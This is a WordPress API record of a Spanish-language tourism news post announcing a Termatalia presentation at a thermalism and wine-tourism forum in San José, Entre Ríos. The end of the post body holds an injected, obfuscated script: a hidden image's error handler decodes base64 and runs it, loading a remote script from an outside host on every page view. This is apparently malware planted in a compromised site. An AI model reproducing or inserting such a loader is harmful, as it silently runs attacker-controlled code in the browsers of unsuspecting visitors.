{"id":9461,"date":"2025-04-09T08:45:58","date_gmt":"2025-04-09T11:45:58","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9461"},"modified":"2025-08-13T15:30:03","modified_gmt":"2025-08-13T18:30:03","slug":"termatalia-se-presentara-en-san-jose-provincia-de-entre-rios-para-argentina-y-uruguay","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9461","title":{"rendered":"Termatalia se presentar\u00e1 en San Jos\u00e9, provincia de Entre Rios para-Argentina y Uruguay"},"content":{"rendered":"\n<p><strong><em>&gt;&gt; Se promocionar\u00e1 en el 1\u00ba Foro de Termalismo y Enoturismo en San Jos\u00e9, Entre R\u00edos, los pr\u00f3ximos 15, 16 y 17 de mayo<\/em><\/strong><\/p>\n\n\n\n<p>Termatalia Colombia 2025 contin\u00faa su promoci\u00f3n internacional que la lleva a estar presente en importantes eventos de turismo tanto en Europa como en Am\u00e9rica. El pr\u00f3ximo destino en esta campa\u00f1a promocional ser\u00e1 la ciudad de San Jos\u00e9, en la provincia argentina de Entre R\u00edos. All\u00ed se celebrar\u00e1, entre el 15 y el 17 de mayo, el 1\u00ba Foro de Termalismo y Enoturismo cuyo programa de actividades incluye la presentaci\u00f3n oficial de la pr\u00f3xima edici\u00f3n.<\/p>\n\n\n\n<p>Esta presentaci\u00f3n correr\u00e1 a cargo de Rogelio Mart\u00ednez Gonz\u00e1lez, director gerente de Expourense; de Ricardo Camacho, alcalde de Paipa (Colombia; y de la Lic. Teresita Van Strate, delegada para Argentina de la Feria.&nbsp;Ser\u00e1 la 23\u00b0 edici\u00f3n de esta Feria Internacional de Turismo Termal, Salud y Bienestar con sede en Ourense (ES) que este a\u00f1o vuelve a Latinoam\u00e9rica y se celebrar\u00e1 entre el 24 y el 26 de septiembre de 2025 en la Municipalidad termal de Paipa, departamento de Boyac\u00e1, en Colombia<\/p>\n\n\n\n<p>Despu\u00e9s de Lima (Per\u00fa) en 2012, Termas de R\u00edo Hondo (Argentina) en 2014; Saltillo (M\u00e9xico) en 2016, Foz de Igua\u00e7\u00fa (Brasil) en 2018 y Salto \u2013 Paysand\u00fa (Uruguay) en 2023, la municipalidad de Paipa asume ahora el reto de ser la sede f\u00edsica de este evento y de recibir a los profesionales de una treintena de pa\u00edses que participar\u00e1n del mismo. Desde el 2012 Termatalia alterna su sede entre Ourense, en Galicia (ES) y un pa\u00eds latinoamericano, por lo que se la considera un faro de conocimiento y puente de interacci\u00f3n social y comercial entre los pa\u00edses de Iberoam\u00e9rica. A\u00fan en \u00e9poca de pandemia se sigui\u00f3 celebrando de manera virtual en 2020 y 21, retomando su car\u00e1cter presencial en 2022 en Espa\u00f1a y 2023 en Salto-Paysand\u00fa en Uruguay.<\/p>\n\n\n\n<p>Por su parte, la ciudad de San Jos\u00e9, en Entre R\u00edos, se prepara para albergar un evento de alcance binacional con una fuerte presencia de exponentes del termalismo y el Enoturismo de Argentina y Uruguay, en cuyo marco se realizar\u00e1 la presentaci\u00f3n oficial Termatalia 2025, con mensajes v\u00eda streaming desde Espa\u00f1a y Colombia.<\/p>\n\n\n\n<p>Las inscripciones para participar del Foro y de las presentaciones son gratuitas y ya est\u00e1n disponibles en www.sanjose.tur.ar\/foro. Desde all\u00ed se puede acceder a un paquete social con servicios opcionales de comidas y recreaci\u00f3n, adem\u00e1s de importantes descuentos en alojamientos y transporte para quienes quieran asistir a este evento \u00fanico de conocimientos e interacciones comerciales.<\/p>\n\n\n\n<p>Los paneles estar\u00e1n enfocados en la innovaci\u00f3n tur\u00edstica y el desarrollo de experiencias de estos dos segmentos tan significativos como lo son el Termalismo y turismo de bienestar y el Enoturismo. Para ello se contar\u00e1 con la participaci\u00f3n de disertantes y actores regionales, nacionales e internacionales.&nbsp;Este Foro ser\u00e1 un gran espacio para compartir miradas, avances y desaf\u00edos; destinado a empresarios, especialistas, acad\u00e9micos, funcionarios, estudiantes y p\u00fablico en general.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-9464\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-1024x576.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-300x169.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-768x432.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-696x392.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-1068x601.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-747x420.jpeg 747w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-320x180.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-480x270.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1-800x450.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/WhatsApp-Image-2025-02-14-at-17.33.25-2-1536x864-1.jpeg 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>La delegada internacional de Termatalia, Lic. Teresita Van Strate, quien es adem\u00e1s una destacada referente del termalismo en Am\u00e9rica Latina, estar\u00e1 coordinando este foro.&nbsp;<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n sobre este foro:&nbsp;<a href=\"https:\/\/sanjose.tur.ar\/foro\/\">https:\/\/sanjose.tur.ar\/foro\/&nbsp;<\/a><\/p>\n<p>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/termatalia-colombia-2025-se-presentara-en-san-jose-para-argentina-y-uruguay\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.termatalia.com\/wp-content\/uploads\/Termatalia.png.webp\" alt=\"\" style=\"width:193px;height:auto\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>&gt;&gt; Se promocionar\u00e1 en el 1\u00ba Foro de Termalismo y Enoturismo en San Jos\u00e9, Entre R\u00edos, los pr\u00f3ximos 15, 16 y 17 de mayo Termatalia Colombia 2025 contin\u00faa su promoci\u00f3n internacional que la lleva a estar presente en importantes eventos de turismo tanto en Europa como en Am\u00e9rica. El pr\u00f3ximo destino en esta campa\u00f1a promocional [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9440,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9461","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9461"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9461\/revisions"}],"predecessor-version":[{"id":9950,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9461\/revisions\/9950"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9440"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9461"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}